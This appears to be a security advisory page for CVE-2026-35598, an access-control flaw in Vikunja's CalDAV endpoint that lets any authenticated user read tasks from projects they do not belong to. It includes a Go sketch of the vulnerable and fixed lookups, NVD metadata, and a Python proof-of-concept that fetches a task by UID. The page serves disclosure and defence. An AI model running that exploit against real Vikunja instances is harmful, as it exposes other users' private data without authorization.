Security Vulnerability Report
CVE-2026-35598 CVSS 4.3 MEDIUM

Published: 2026-04-10 17:17:03
Last Modified: 2026-04-17 21:57:42

Description

Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the CalDAV GetResource and GetResourcesByList methods fetch tasks by UID from the database without verifying that the authenticated user has access to the task's project. Any authenticated CalDAV user who knows (or guesses) a task UID can read the full task data from any project on the instance. This vulnerability is fixed in 2.3.0.
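As an added illustration (not code from Vikunja or from its patch), the lookup-by-UID pattern the description names sits beside a version that checks the caller's project membership before returning the task. The Task and Store types, the user names and the UIDs are constructed for this example.

```go
package main

import "fmt"

// Constructed in-memory stand-in for the database; none of these names are Vikunja's.
type Task struct {
	UID       string
	ProjectID int
	Title     string
}
type Store struct {
	tasks   map[string]Task         // task UID -> task
	members map[int]map[string]bool // project ID -> users allowed to read it
}
var ErrNotFound = fmt.Errorf("task not found")

// getResourceVulnerable mirrors the advisory: lookup by UID alone, no access check.
func (s *Store) getResourceVulnerable(uid string) (Task, error) {
	if t, ok := s.tasks[uid]; ok {
		return t, nil
	}
	return Task{}, ErrNotFound
}

// getResourceFixed adds the project check; foreign and unknown UIDs both get "not found".
func (s *Store) getResourceFixed(user, uid string) (Task, error) {
	t, ok := s.tasks[uid]
	if !ok || !s.members[t.ProjectID][user] {
		return Task{}, ErrNotFound
	}
	return t, nil
}

// Constructed sample data: project 1 is Alice's alone, project 2 is shared with Bob.
func newSampleStore() *Store {
	return &Store{
		tasks: map[string]Task{
			"uid-alice-1":  {UID: "uid-alice-1", ProjectID: 1, Title: "Alice's private task"},
			"uid-shared-1": {UID: "uid-shared-1", ProjectID: 2, Title: "Shared task"},
		},
		members: map[int]map[string]bool{1: {"alice": true}, 2: {"alice": true, "bob": true}},
	}
}

func main() {
	s := newSampleStore()
	t, _ := s.getResourceVulnerable("uid-alice-1") // any authenticated caller gets Alice's task
	_, err := s.getResourceFixed("bob", "uid-alice-1")
	fmt.Println(t.Title, "|", err)
}
```

Answering "not found" for a task the caller may not read, rather than a distinct "forbidden", also keeps the UID itself from being confirmed as valid.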

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:* - VULNERABLE
Vikunja < 2.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
from requests.auth import HTTPBasicAuth

# Target configuration
TARGET_URL = "https://vikunja.example.com/dav/calendars/user/"
USERNAME = "[email protected]"
PASSWORD = "password"
TASK_UID = "target-task-uid-12345"  # The UID of the task the attacker wants to read


# Exploit code to fetch a task by UID without project access check
# Note: This simulates the CalDAV GET request
def exploit():
    # Authenticate with the CalDAV endpoint
    auth = HTTPBasicAuth(USERNAME, PASSWORD)

    # Construct the URL to fetch the specific task resource by UID
    # In a real scenario, the exact path might vary based on Vikunja's CalDAV routing
    exploit_url = f"{TARGET_URL}{TASK_UID}.ics"

    try:
        print(f"[*] Attempting to fetch task with UID: {TASK_UID}")
        response = requests.get(exploit_url, auth=auth)

        if response.status_code == 200:
            print("[+] Exploit successful! Task data retrieved:")
            print(response.text)
        else:
            print(f"[-] Failed to retrieve task. Status code: {response.status_code}")
            print(response.text)
    except Exception as e:
        print(f"[!] An error occurred: {e}")


if __name__ == "__main__":
    exploit()
```

References

https://github.com/go-vikunja/vikunja/commit/879462d717351fe5d276ddec5246bdec31b41661 (Patch)
https://github.com/go-vikunja/vikunja/pull/2579 (Issue Tracking)
https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0 (Release Notes)
https://github.com/go-vikunja/vikunja/security/advisories/GHSA-48ch-p4gq-x46x (Exploit, Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-35598", "sourceIdentifier": "[email protected]", "published": "2026-04-10T17:17:03.370", "lastModified": "2026-04-17T21:57:42.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the CalDAV GetResource and GetResourcesByList methods fetch tasks by UID from the database without verifying that the authenticated user has access to the task's project. Any authenticated CalDAV user who knows (or guesses) a task UID can read the full task data from any project on the instance. This vulnerability is fixed in 2.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.0", "matchCriteriaId": "CC8B46CF-6E7B-46F4-8275-D1A38F2A6D5E"}]}]}], "references": [{"url": "https://github.com/go-vikunja/vikunja/commit/879462d717351fe5d276ddec5246bdec31b41661", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/go-vikunja/vikunja/pull/2579", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-48ch-p4gq-x46x", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-48ch-p4gq-x46x", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
```